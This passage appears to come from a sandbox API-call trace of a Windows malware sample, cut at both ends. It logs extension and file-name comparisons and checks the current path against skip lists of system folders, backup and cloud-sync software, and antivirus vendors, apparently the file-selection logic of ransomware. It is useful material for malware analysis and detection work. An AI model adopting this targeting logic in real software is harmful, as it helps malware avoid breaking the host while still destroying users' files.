cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SENDMAIL.ESP", cchCount2=12) returned 3 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SENDMAIL.ESP", cchCount2=12) returned 1 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SENDMAIL.ESP", cchCount2=12) returned 3 [0058.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SENDMAIL.ESP", cchCount2=12) returned 3 [0058.432] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.432] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.432] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.432] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.432] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.433] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.433] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.434] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.434] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.435] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.435] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.435] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.435] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.435] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.435] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.436] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.436] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.436] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.436] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.436] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.436] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.436] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.436] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.436] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.436] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.437] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.437] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.438] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.438] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files 